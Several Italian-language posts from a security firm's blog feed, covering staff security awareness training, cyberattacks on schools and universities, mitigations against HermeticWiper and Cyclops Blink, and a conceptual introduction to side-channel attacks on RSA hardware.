&lt;p&gt;La nascita del World Wide Web così come lo intendiamo noi è avvenuta nel 1991; da allora il mondo online è diventato sempre più parte della nostra quotidianità.&lt;/p&gt;

&lt;p&gt;Se dobbiamo cercare qualche informazione utilizziamo internet, se dobbiamo prenotare una vacanza utilizziamo internet e addirittura, con la pandemia, anche aspetti quali le visite mediche sono state trasferite nel mondo virtuale e poi lo smart working e l’e-learning.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;L’emergenza legata al Covid ha accelerato significativamente il processo di digitalizzazione, modificando i comportamenti degli utenti con una maggiore spinta verso la sfera digitale&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Questo spostamento ha portato ad un &lt;strong&gt;aumento dell’attività da parte dei cyber criminali&lt;/strong&gt; e quindi ad un aumento complessivo del numero di attacchi informatici. Inoltre, &lt;strong&gt;è cresciuto non solo il numero degli episodi, ma anche la loro complessità, il grado di sofisticatezza e l’entità del loro impatto&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Secondo un Report di &lt;a href=&#34;https://www.checkpoint.com/pages/cyber-security-report-2021/&#34;&gt;Check Point Research&lt;/a&gt;, nel 2021, in tutto il mondo &lt;strong&gt;gli attacchi informatici verso le aziende sono cresciuti del 40% rispetto al 2020&lt;/strong&gt;; settimanalmente le aziende italiane ne subiscono mediamente 903 e hanno visto crescere la percentuale del 36%, rispetto al 2020.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gli attacchi informatici sono veicolati per oltre il 90% da e-mail aziendali colpite da campagne di phishing&lt;/strong&gt; che, con il passare del tempo, sono diventate sempre più sofisticate, inducendo in errore anche chi ha una certa esperienza.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Diventa quindi importante investire sulla consapevolezza degli utenti e indicare delle linee guida e best practice da adottare&lt;/strong&gt;. Se infatti le aziende possono dotarsi di tutte le tecnologie più sofisticate, l’aspetto più importante rimane comunque la formazione degli utenti e la capacità di non cascare nei tranelli dei cyber criminali: è infatti il fattore umano l’anello debole della catena.&lt;/p&gt;

&lt;p&gt;Molto spesso gli utenti non sono realmente consci della gravità che un impatto simile può avere nel breve e soprattutto nel lungo periodo.&lt;/p&gt;

&lt;p&gt;Il motivo principale per cui un attacco informatico viene indirizzato ad un’azienda è per richiedere un riscatto; in particolare, si evidenza una tendenza al rialzo per il prezzo medio, che è passato dai 6.000$ nel 2018 fino agli 84.000$ nel 2019, mentre è di difficile stima il prezzo medio degli ultimi mesi sia per l&amp;rsquo;incremento dei numeri di attacchi informatici ma anche per l&amp;rsquo;utilizzo delle criptovalute che non permettono il tracciamento dei riscatti pagati.&lt;/p&gt;

&lt;p&gt;Inoltre, ricordiamo che non è assolutamente detto che pagando il riscatto vengano restituiti all’azienda tutti i dati esfiltrati, motivo che può portare ad un aumento del danno economico per la risoluzione di un attacco informatico.&lt;/p&gt;

&lt;h2 id=&#34;ma-quanto-costa-quindi-all-azienda-un-attacco-informatico-andato-a-buon-segno&#34;&gt;Ma quanto costa quindi all’azienda un attacco informatico andato a buon segno?&lt;/h2&gt;

&lt;p&gt;In genere l’impatto è sempre pesante: secondo il report di IBM, &lt;strong&gt;ogni violazione dei dati sulle organizzazioni costa all’azienda, in media, 3.86 milioni di dollari a livello globale e 2.90 milioni di euro se consideriamo la nostra nazione&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Come abbiamo detto, è il fattore umano il punto debole della catena, per questo &lt;strong&gt;adeguate misure di security awareness possono essere fondamentali per proteggere l’azienda&lt;/strong&gt;.
La consapevolezza degli utenti passa, prima di tutto, dalla formazione: formare il personale, infatti, ha un costo enormemente più basso rispetto al ripristino di un incidente informatico.&lt;/p&gt;

&lt;p&gt;La maggior parte delle minacce proviene proprio dalla poca attenzione che le persone mettono nel compiere azioni di routine quali: l’utilizzo delle proprie credenziali, la navigazione non sicura o la poca attenzione nella gestione della posta elettronica. Sono solo pochi esempi ma che, da soli, coprono oltre l’85% delle cause di un incidente di sicurezza.&lt;/p&gt;

&lt;h2 id=&#34;best-practice&#34;&gt;Best practice&lt;/h2&gt;

&lt;p&gt;La prima cosa importante da sottolineare è che &lt;strong&gt;non è possibile evitare al 100% un attacco informatico, ma esistono diverse azioni e best practice da mettere in atto per cercare di ridurre al minimo questo rischio&lt;/strong&gt;.&lt;/p&gt;

&lt;h3 id=&#34;corsi-di-formazione&#34;&gt;Corsi di formazione&lt;/h3&gt;

&lt;p&gt;Aumentare la soglia di attenzione dei dipendenti attraverso training specifici è di fondamentale importanza per limitare il rischio e creare una maggiore consapevolezza della pericolosità che un attacco informatico può provocare, non solo all’azienda, ma anche al singolo individuo. La formazione deve essere continua e nell’arco di un lungo periodo, in modo da tenere sempre alta la sensibilità degli utenti sull’argomento.&lt;/p&gt;

&lt;h3 id=&#34;corsi-personalizzati-ed-in-lingua&#34;&gt;Corsi personalizzati ed in lingua&lt;/h3&gt;

&lt;p&gt;Secondo la nostra esperienza, anche creare contenuti ad hoc in lingua può essere utile affinché il trasferimento della cultura in tema di sicurezza informatica sia appreso in maniera più diretta possibile. La personalizzazione in base al tipo di azienda, al livello di preparazione degli utenti è sicuramente un plus da considerare, soprattutto se l’azienda ha sedi al di fuori del territorio italiano.
Al contrario, l’utilizzo di una piattaforma standardizzata, in cui vengono semplicemente condivise le nozioni, non può essere la soluzione ottimale, poiché manca la personalizzazione e soprattutto il confronto con esperti del settore, in grado di rispondere alle domande e ai dubbi degli utenti.&lt;/p&gt;

&lt;h3 id=&#34;bollettini-settimanali&#34;&gt;Bollettini settimanali&lt;/h3&gt;

&lt;p&gt;Settimanalmente è utile condividere con i propri dipendenti quelle che sono le campagne di phishing in atto, spiegare quali sono gli elementi per cui essere sospettosi e dare così alcuni strumenti che aiutino i dipendenti ad evitare di cadere vittima di campagne, anche in futuro.&lt;/p&gt;

&lt;h3 id=&#34;phishing-test&#34;&gt;Phishing Test&lt;/h3&gt;

&lt;p&gt;Una buona pratica consiste nel creare test ad hoc che simulano degli attacchi phishing per testare il livello di preparazione dei propri dipendenti. Queste campagne mirate sono del tutto innocue, ma risultano molto utili per fornire una fotografia del livello di vulnerabilità del fattore umano all&amp;rsquo;interno dell&amp;rsquo;azienda. I risultati ottenuti sono utili per capire come impostare i corsi di formazione, insistendo maggiormente sulle persone che hanno “abboccato” al tranello.&lt;/p&gt;

&lt;h3 id=&#34;analisi-osint&#34;&gt;Analisi OSINT&lt;/h3&gt;

&lt;p&gt;Open Source Intelligence o OSINT sono ricerche di informazioni private appartenenti ad un’azienda o ad un singolo individuo che vengono fatte per capire l’esposizione dei dati disponibili su internet.
Partendo dal solo nome e cognome è infatti possibile impersonare un soggetto (sono molto comuni, tra gli altri, i casi di CEO fraud); inoltre, avendo a disposizione informazioni aggiuntive, come la data e il luogo di nascita, i cyber criminali possono rendere le comunicazioni ancora più credibili.&lt;br /&gt;
L’OSINT si rivela uno strumento estremamente utile ed efficace per investigare la presenza di informazioni e il rischio connesso al riutilizzo di tali dati a fini malevoli. Nel caso in cui invece la ricerca dovesse essere eseguita con finalità malevole si parla di Bad OSINT.&lt;/p&gt;

&lt;p&gt;Dopo un’adeguata formazione, al contrario di quello che ci si potrebbe aspettare, gli utenti dovrebbero essere in grado di riconoscere i diversi casi di ingegneria sociale e quindi, seguendo le procedure e policy interne dell’azienda, riportare un maggior numero di incidenti direttamente al dipartimento IT.
Questo potrebbe essere un modo utile per misurare se le best practice seguite sono servite agli utenti a familiarizzare con il tema, a riconoscere campagne di phishing ed evitare di caderne vittima.&lt;/p&gt;

&lt;p&gt;Negli ultimi mesi sta cambiando anche l’approccio delle aziende verso il concetto di cyber security awareness: sono infatti le stesse organizzazioni che, in seguito al costante aumento di attacchi subiti (il numero di attacchi rilevati nel 2020 segna un aumento del 29% rispetto alla media degli attacchi per anno del triennio precedente), stanno investendo sulla formazione erogata ai propri dipendenti.&lt;/p&gt;

&lt;p&gt;Secondo il report che abbiamo stilato in collaborazione con Statista, è stato osservato che per molti intervistati (42%), queste minacce si sono verificate almeno una volta al mese, mentre il 31% ha subito almeno due attacchi al mese e solo il 4% degli intervistati ha subito in media più di tre attacchi al mese. Il restante 15% non ha assistito a una minaccia nell&amp;rsquo;ultimo anno e ciò potrebbe essere dovuto al fatto che alcune aziende semplicemente non erano a conoscenza degli attacchi accaduti loro.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/awareness/awareness-1.PNG&#34; alt=&#34;cyber-security-awareness&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Infine, vogliamo ricordare che &lt;strong&gt;nella cybersecurity non ci si improvvisa: agire sul fattore umano e creare una cultura sulla difesa informatica è solo il primo passo per una protezione efficace&lt;/strong&gt; contro il cyber crimine, che deve poi proseguire con l’analisi e la gestione dei rischi da parte di specialisti del settore che, con l’utilizzo di strumenti a loro disposizione, saranno in grado di ridurre l’esposizione ai cyber rischi.&lt;/p&gt;

&lt;p&gt;Parte della nostra missione consiste proprio nell’agire e nel creare una consapevolezza negli utenti dei clienti tramite le best practice descritte. Se sei interessato visita il &lt;a href=&#34;https://cybergon.com/&#34;&gt;nostro sito&lt;/a&gt; e contattaci.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Education e Cyber Security: Italia sul podio per attacchi subiti</title>
         <link>https://blog.cybergon.com/posts/education-e-cyber-security-italia-sul-podio-per-attacchi-subiti/</link>
         <pubDate>Tue, 15 Mar 2022 10:16:00 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/education-e-cyber-security-italia-sul-podio-per-attacchi-subiti/</guid>
         <description>

&lt;p&gt;&lt;strong&gt;L’Italia è il secondo Paese al mondo a subire attacchi informatici nel settore dell’istruzione e della ricerca&lt;/strong&gt;. Sul podio troviamo l’India in prima posizione con una media di 5.196 attacchi, seguita dall’Italia, con una media di 5.106, e Israele con 4.011 attacchi.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/education/education-1.PNG&#34; alt=&#34;symmetric-asymmetric-encryption&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Tra luglio e agosto 2020, il numero medio di attacchi settimanali per organizzazione nel settore dell’istruzione è aumentato del 30% rispetto ai due mesi precedenti, passando da 468 a 608 attacchi; il dato mette in allarme, specialmente se comparato con l’aumento degli attacchi informatici verso tutti gli altri settori, fermo a “solo” il 6,5% nello stesso periodo.
&lt;strong&gt;Secondo il Rapporto Clusit 2021&lt;/strong&gt;, inoltre, &lt;strong&gt;il settore della ricerca e dell’istruzione ha registrato un aumento degli attacchi del 46,8% nel 2020 rispetto al 2019&lt;/strong&gt;, proprio nel periodo che coincide con l’introduzione della DAD.&lt;/p&gt;

&lt;h2 id=&#34;perché-il-settore-dell-education&#34;&gt;Perché il settore dell’education?&lt;/h2&gt;

&lt;p&gt;Come per l’Healthcare (LINK), anche quello dell’istruzione e della ricerca è un settore di interesse per i cyber criminali. Oltre alle possibili perdite finanziarie legate ad un attacco informatico, ci sono altri rischi che entrano in gioco nel settore dell’istruzione e della ricerca. Da un lato &lt;strong&gt;il grande numero di dati sensibili legati a studenti ed insegnanti archiviati negli anni&lt;/strong&gt;; &lt;strong&gt;dall’altro lato la possibile perdita di proprietà intellettuali e brevetti relativi a nuove scoperte da parte di istituti accademici&lt;/strong&gt;. In caso di perdita o compromissione, infatti, i danni potrebbero recare, oltre al danno di reputazione, anche gravi problemi alla sicurezza degli utenti connessi al mondo dell’istruzione e della ricerca.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/education/education-2.jpg&#34; alt=&#34;symmetric-asymmetric-encryption&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Se l’interesse per questo settore ha avuto un’impennata negli ultimi due anni, all’inizio del nuovo millennio, però, erano già stati registrati alcuni attacchi informatici ad università a livello mondiale.
&lt;strong&gt;È il caso di citare l’università di Yale&lt;/strong&gt;, che nel 2002 subì un attacco da parte di un utente che si scoprì poi essere il direttore delle ammissioni della Princeton University, il quale cercava informazioni sulle modalità e criteri di ammissione all’università.
Diversamente da quello che succede oggigiorno, gli attacchi dei primi anni 2000 erano organizzati da persone che avevano l’obiettivo o di rubare informazioni senza il secondo fine della rivendita o, addirittura, di testare il livello di protezione dell’organizzazione, come nel caso dell’&lt;strong&gt;attacco all’Università di Stanford dall’hacker “Ag3nt47”&lt;/strong&gt;, che rese personalmente nota la notizia tramite un tweet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Quello che è cambiato nel corso degli anni è, infatti, il fine ultimo dell’esfiltrazione di queste informazioni&lt;/strong&gt;: in primis, non si tratta più di individui che operano singolarmente, ma di organizzazioni criminali e, in secondo luogo, l’obiettivo finale di questi attacchi informatici è ormai principalmente solo il guadagno monetario.&lt;/p&gt;

&lt;h2 id=&#34;il-ruolo-della-pandemia&#34;&gt;Il ruolo della pandemia&lt;/h2&gt;

&lt;p&gt;DAD, aka Didattica a Distanza, è stato uno degli acronimi più utilizzati e sentiti negli ultimi due anni. Studenti ed insegnanti si sono ritrovati, da un giorno all’altro, in un mondo completamente diverso. &lt;strong&gt;Durante la pandemia, infatti, migliaia di scuole e università si sono dovute digitalizzare in poco tempo, senza però che gli adeguati protocolli di sicurezza andassero di pari passo con la digitalizzazione&lt;/strong&gt;. Questa mancanza ha fatto sì che un numero sempre maggiore di organizzazioni educative fosse preso di mira dai cyber criminali, per la facilità con cui è possibile colpire queste istituzioni, siano esse private o pubbliche.&lt;/p&gt;

&lt;p&gt;La pandemia ha forzato non solo lo smart working, ma anche l’online learning. I numeri registrati sono sconcertanti e il trend è chiaramente in aumento. &lt;strong&gt;Durante lo scorso mese di luglio, per esempio, è stato registrato il maggior volume di attacchi, con una media di 1.739, con un aumento del 29% rispetto alla prima metà del 2021&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/education/education-3.jpg&#34; alt=&#34;symmetric-asymmetric-encryption&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;minacce-più-comuni&#34;&gt;Minacce più comuni&lt;/h2&gt;

&lt;p&gt;Le piattaforme online e connessioni remote, per un gran numero di alunni e insegnanti, creano nuovi punti di ingresso, spesso non protetti, per i criminali informatici. &lt;strong&gt;Essi sfruttano bug senza patch o password deboli, nonché endpoint remoti non protetti per ottenere l’accesso&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Secondo il report Data Breach Investigation del 2020, &lt;strong&gt;oltre l’80% delle violazioni della sicurezza è stato causato dal furto di credenziali&lt;/strong&gt;. Infatti, se un account di posta elettronica viene compromesso, l’intera organizzazione può subire gravi danni.&lt;/p&gt;

&lt;p&gt;Un altro attacco utilizzato in questo settore è &lt;strong&gt;l’information Disclosure che mira ad acquisire informazioni specifiche del sistema di un sito web&lt;/strong&gt;. Le informazioni acquisite possono contenere anche la posizione dei file di backup o di file temporanei. Maggiore è il numero di informazioni disponibili, più sarà facile compromettere il sistema.&lt;/p&gt;

&lt;p&gt;Anche &lt;strong&gt;il metodo costituito dagli attacchi DDoS (Distributed Denial of Service) è particolarmente utilizzato&lt;/strong&gt;. L’obiettivo di questo tipo di attacco è volto a sconvolgere il normale traffico di un server o di una rete, sovraccaricando l’obiettivo o l’infrastruttura circostante creando traffico Internet.&lt;/p&gt;

&lt;h2 id=&#34;investimenti-in-cybersecurity&#34;&gt;Investimenti in cybersecurity&lt;/h2&gt;

&lt;p&gt;La realizzazione degli obiettivi di crescita digitale e di modernizzazione delle strutture di formazione e ricerca costituisce una priorità per il rilancio del paese. &lt;strong&gt;L’obiettivo del Piano Nazionale di Ripresa e Resilienza è quello di investire 623 milioni dei 191,5 miliardi totali per rafforzare le difese di cybersecurity&lt;/strong&gt; nelle pubbliche amministrazioni in generale, per la difesa dalle minacce informatiche come frodi, ricatti e attacchi terroristici e tutti i rischi posti dalla criminalità informatica.&lt;/p&gt;

&lt;p&gt;L’investimento si articola principalmente su quattro pilastri:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Diffondere l’identità digitale, assicurando che venga utilizzata da almeno il 70% della popolazione. Gli investimenti serviranno al miglioramento dei servizi digitali per cittadini e per la trasformazione delle infrastrutture nella PA.&lt;/li&gt;
&lt;li&gt;Costruire e consolidare le capacità di ispezione e audit del Paese di hardware e software utilizzati da soggetti con funzioni essenziali per certificare l’affidabilità e prevenire le minacce.&lt;/li&gt;
&lt;li&gt;Potenziare le forze dell’ordine e le unità informatiche all’interno delle Forze di Polizia preposte alle indagini su attività cyber criminali.&lt;/li&gt;
&lt;li&gt;Colmare il gap di competenze digitali, rafforzando in modo significativo le risorse informatiche e le risorse umane responsabili della sicurezza nazionale e della risposta alle minacce informatiche.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;in-conclusione&#34;&gt;In conclusione&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Gli esseri umani sono, in genere, l’anello più debole quando si tratta di sicurezza informatica&lt;/strong&gt;. L’invito agli studenti, ai genitori e alle istituzioni è di fare molta attenzione, poiché sia i numeri che i metodi dell’attacco potrebbero peggiorare.&lt;/p&gt;

&lt;p&gt;Si prevede che, anche dopo la pandemia, si continueranno a seguire dei modelli di apprendimento digitale, in cui, per esempio, le università offriranno agli studenti più opzioni e una maggiore flessibilità rispetto alle sole lezioni tradizionali. L’online learning quindi rimarrà, così come l’interesse dei cyber criminali per il mondo dell’istruzione e della ricerca.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il settore dell’educazione è vulnerabile e diversi investimenti in termini di cyber sicurezza andrebbero fatti&lt;/strong&gt;. Nessun ente scolastico può esimersi dal prestare particolare attenzione alla sicurezza e ai propri sistemi online, soprattutto in un contesto storico come quello attuale, dove la nostra vita si sta svolgendo prevalentemente online.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Cyberwar: i rischi di sicurezza e le azioni di mitigazione per le aziende</title>
         <link>https://blog.cybergon.com/posts/cyberwar-i-rischi-di-sicurezza-e-le-azioni-di-mitigazione-per-le-aziende/</link>
         <pubDate>Wed, 02 Mar 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Nilo</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cyberwar-i-rischi-di-sicurezza-e-le-azioni-di-mitigazione-per-le-aziende/</guid>
         <description>

&lt;p&gt;Gli avvenimenti drammatici delle ultime settimane sono noti a tutti, così com&amp;rsquo;è noto che il campo di azione si è esteso anche al cyberspazio.
In questo articolo non entreremo nel merito politico della cyberwar in atto, ma analizzeremo i &lt;strong&gt;rischi per le aziende sul nostro territorio e relative azioni di mitigazione&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cyberwar/cyber-war-copertina.jpg&#34; alt=&#34;cyberwar&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Lo scenario che dal punto di vista della sicurezza informatica ci troviamo ad affrontare comprende la nascita di due minacce specifiche, i &lt;strong&gt;malware HermeticWiper e Cyclops Blink&lt;/strong&gt;, che insieme a sfruttamento di vulnerabilità, phishing, attacchi DDoS e naturalmente altre tipologie di ransomware già in circolazione, potrebbero essere veicolati da gruppi criminali che approfittano della situazione di emergenza per colpire.&lt;/p&gt;

&lt;h2 id=&#34;hermeticwiper-e-cyclops-blink&#34;&gt;HermeticWiper e Cyclops Blink&lt;/h2&gt;

&lt;p&gt;Il primo malware nato in occasione del conflitto ha uno scopo distruttivo: CSIRT Italia indica che l&amp;rsquo;obiettivo di HermeticWiper è di &lt;strong&gt;distruggere intenzionalmente i dati presenti su un dispositivo al fine di renderli irrecuperabili&lt;/strong&gt;, minando il corretto funzionamento del sistema operativo in esecuzione. Non si tratta quindi di un ransomware &amp;ldquo;classico&amp;rdquo;, che fornirebbe la speranza di poter ripristinare i sistemi e recuperare i dati, ma di un attacco potenzialmente devastante per l&amp;rsquo;azienda.&lt;/p&gt;

&lt;p&gt;Cyclops Blink è stato analizzato congiuntamente dal National Cyber Security Centre (NCSC) del Regno Unito, della Cybersecurity and Infrastructure Security Agency (CISA), della National Security Agency (NSA) e del Federal Bureau of Investigation (FBI) e viene indicato come un &lt;em&gt;&amp;ldquo;pezzo di malware altamente sofisticato che è stato sviluppato professionalmente&amp;rdquo;&lt;/em&gt; (&lt;a href=&#34;https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf&#34;&gt;Qui l&amp;rsquo;analisi completa&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;La distribuzione del malware sembra avvenire &lt;strong&gt;verso dispositivi di rete esposti su Internet, in particolare relativi al prodotto WatchGuard&lt;/strong&gt;. La persistenza sui dispositivi target è ottenuta sfruttando un aggiornamento firmware apparentemente legittimo, che garantisce l’esecuzione del codice malevolo anche a seguito di eventuali riavvii dei sistemi interessati.
WatchGuard, in collaborazione con CISA, FBI, NSA e NCSC UK, ha reso disponibili &lt;a href=&#34;https://detection.watchguard.com/&#34;&gt;a questo link&lt;/a&gt; le indicazioni necessarie all’identificazione e alla rimozione di Cyclops Blink sui dispositivi interessati.&lt;/p&gt;

&lt;h2 id=&#34;consigli-e-azioni-di-mitigazione&#34;&gt;Consigli e azioni di mitigazione&lt;/h2&gt;

&lt;p&gt;Come abbiamo anticipato, il rischio di compromissione si presenta in relazione a queste minacce specifiche, ma non solo: gruppi criminali estranei al conflitto potrebbero sfruttare il momento di crisi per attaccare indistintamente e violentemente.
Dal nostro punto di vista è necessario che &lt;strong&gt;tutte le imprese sul nostro territorio facciano  attenzione&lt;/strong&gt;, specialmente se hanno sedi o relazioni con aziende nei paesi coinvolti.&lt;/p&gt;

&lt;p&gt;Consigliamo di mettere in campo &lt;strong&gt;queste pratiche&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Innalzare il livello di priorità nel monitoraggio di eventi che coinvolgano sistemi presenti in Ucraina e/o Russia;&lt;/li&gt;
&lt;li&gt;Prestare attenzione a eventi che coinvolgono IP pubblici indicati nelle &lt;a href=&#34;https://csirt.gov.it/contenuti/ucraina-pubblicati-nuovi-importanti-ed-urgenti-ioc-al01-220224-csirt-ita&#34;&gt;liste rilasciate dal CERT&lt;/a&gt; e in generale da IP pubblici assegnati a Russia o Ucraina;&lt;/li&gt;
&lt;li&gt;Monitorare tutti gli accessi a piattaforme sensibili, come Office365 e Azure, che provengono dai paesi a rischio;&lt;/li&gt;
&lt;li&gt;Mantenere aggiornati gli Indicator Of Compromise (IOC), identificati a livello internazionale e consigliati dal CERT Europeo, sugli strumenti di detection.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Infine, pratiche di &lt;strong&gt;patching&lt;/strong&gt; di tool con vulnerabilità note e innalzamento del &lt;strong&gt;livello di consapevolezza interno&lt;/strong&gt; rispetto ai rischi legati, ad esempio, a mail di phishing, contribuiranno a &lt;strong&gt;diminuire il rischio e la superficie di attacco&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In caso di compromissione, il nostro team di specialisti opera in modalità 24x7. Contattaci per un supporto: sos@cybergon.com
 &lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Attacchi side-channel: quando basta ascoltare l’hardware</title>
         <link>https://blog.cybergon.com/posts/attacchi-side-channel-quando-basta-ascoltare-l-hardware/</link>
         <pubDate>Thu, 10 Feb 2022 10:16:00 +0000</pubDate>
         <authors>
         
              
             <author>Marco Prosdocimi</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/attacchi-side-channel-quando-basta-ascoltare-l-hardware/</guid>
         <description>

&lt;p&gt;La diffusione capillare dei computer nelle società moderne è oramai un concetto a cui siamo abituati.
Siamo però meno abituati a pensare a &lt;strong&gt;quanto la crittografia accompagni i dispositivi che utilizziamo tutti i giorni&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Quando apriamo la macchina con delle chiavi wireless, quando effettuiamo un pagamento elettronico o quando inseriamo una tessera dopo aver acquistato un decoder per la televisione, interagiamo con un circuito elettrico che svolge un calcolo di tipo crittografico per noi.&lt;/p&gt;

&lt;p&gt;Proprio su questi dispositivi è nata una delle più bizzarre e particolari categorie di attacchi informatici: &lt;strong&gt;gli attacchi side-channel&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-side-channel/attacchi_side_channel_copertina.png&#34; alt=&#34;attacchi-side-channel&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Facciamo ora un esempio che ci permetterà di capire meglio il contesto in cui questi attacchi hanno luogo.
Pensiamo a quando apriamo la nostra auto con il telecomando, cosa accade realmente?&lt;/p&gt;

&lt;p&gt;Nel migliore degli scenari (purtroppo non sempre) è coinvolto un algoritmo di crittografia: la chiave, infatti, dovrebbe mandare un messaggio “apri” univoco alla nostra auto.&lt;/p&gt;

&lt;p&gt;In caso di messaggio non cifrato, un malintenzionato potrebbe intercettare l’invio del segnale e clonare così le nostre chiavi; se invece il nostro dispositivo è in grado di cifrare il messaggio, una volta che premiamo il tasto “apri”, il segnale cifrato viene inviato alla macchina che lo decifra consentendo l’apertura dell’auto.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cifrare un segnale vuol dire renderlo illeggibile, e quindi inutilizzabile&lt;/strong&gt;, nonostante la possibilità che sia intercettato.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-side-channel/attacchi_side_channel_6.PNG&#34; alt=&#34;attacchi-side-channel-1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Un computer che cifra un messaggio lo rende ineleggibile eseguendo un complesso calcolo matematico che dipende da una chiave, che sarà poi riutilizzata in fase di decifratura per far tornare leggibile il messaggio. Ovviamente, è garantito il fatto che &lt;strong&gt;possedendo il messaggio cifrato non sia possibile né risalire alla chiave né tantomeno al messaggio reale&lt;/strong&gt;. Nel caso delle chiavi della macchina, la chiave crittografica è salvata nella memoria elettronica del dispositivo e dell’auto.&lt;/p&gt;

&lt;p&gt;Un processo simile viene utilizzato anche ogni volta che facciamo un pagamento utilizzando una carta di credito o di debito: senza andare ad approfondire il meccanismo, ci basta sapere che, in quel caso, la chiave è salvata sul chip, solitamente di colore dorato, che poi eseguirà il calcolo crittografico.&lt;/p&gt;

&lt;p&gt;A questo punto è chiaro che la sicurezza di questi dispositivi si basa sulla segretezza della chiave che, ovviamente, essendo salvata elettronicamente, non è facile da recuperare. Tutto quello che noi possiamo rilevare sono solo i messaggi cifrati emessi quando questi dispositivi sono utilizzati.&lt;/p&gt;

&lt;p&gt;Proprio in questo scenario nascono &lt;strong&gt;gli attacchi side-channel che si limitano ad “ascoltare” questi circuiti mentre lavorano&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;attacchi-side-channel&#34;&gt;Attacchi side-channel&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Possiamo definire side-channel quella categoria di attacchi che si basano sulle informazioni ottenute dall&amp;rsquo;implementazione di uno schema di crittografia, anziché sulle sue debolezze matematiche&lt;/strong&gt;.
Prendiamo ad esempio un processore che sta eseguendo un certo algoritmo di crittografia: esso riceve dei dati in input, fa una serie di calcoli e, alla fine, restituisce un risultato. Per fare questo impiegherà un certo tempo e andrà a consumare una certa potenza elettrica.&lt;/p&gt;

&lt;p&gt;Ora immaginiamo di utilizzare lo stesso algoritmo sulla stessa macchina ma con dei dati in input diversi. Il tempo impiegato e la potenza consumata sarà la stessa? In condizioni normali la risposta è no.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-side-channel/attacchi_side_channel_2.PNG&#34; alt=&#34;attacchi-side-channel-2&#34; /&gt;&lt;/p&gt;

&lt;p&gt;A questo punto, supponendo che il tempo e la potenza consumata sono univoci per dato di input, possiamo dedurre che, misurando questi dati, sia possibile ricavare il dato di partenza.&lt;/p&gt;

&lt;p&gt;Tempo, potenza consumata, emissione elettromagnetica e persino il suono che emette un processore, uniti a delle analisi di tipo statistico, sono informazioni che gli attacchi side-channel possono sfruttare per risalire ai dati che un algoritmo sta processando. Quando si parla di crittografia per dati in input si intendono ovviamente le chiavi crittografiche, che devono rimanere segrete.&lt;/p&gt;

&lt;h2 id=&#34;semplice-esempio&#34;&gt;Semplice esempio&lt;/h2&gt;

&lt;p&gt;Per capire come sia possibile fare ciò prendiamo un semplice esempio.&lt;/p&gt;

&lt;p&gt;Ipotizziamo un circuito che esegue una cifratura utilizzando RSA (uno degli schemi di cifratura più usati), come nel caso delle carte di credito.&lt;/p&gt;

&lt;p&gt;Una chiave privata RSA è solitamente composta da 1024 o 2048 bit, cioè “cifre” che possono assumere valore 0 o 1.
In condizioni normali, quando viene eseguita una cifratura di RSA vengono eseguiti diversi calcoli matematici, considerando un bit della chiave alla volta. La particolarità è che i calcoli eseguiti sono differenti a seconda che il singolo bit sia 1 o 0.
Ora, supponendo di poter misurare la potenza consumata o l’emissione elettromagnetica e di poter osservare la traccia su un oscilloscopio, vedremmo qualcosa di simile all’immagine sottostante.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-side-channel/attacchi_side_channel_3.PNG&#34; alt=&#34;test-key-value&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Come si può osservare a occhio nudo, se il bit della chiave è a 1 l’algoritmo esegue le funzioni S (Square) e M (Multiply), se il bit è a 0 esegue solo S.&lt;/p&gt;

&lt;p&gt;Eseguendo un codice diverso si ha una notevole differenza della potenza consumata che è visibile sulla traccia e, di conseguenza, è possibile andare a ricostruire tutta la chiave segreta.&lt;/p&gt;

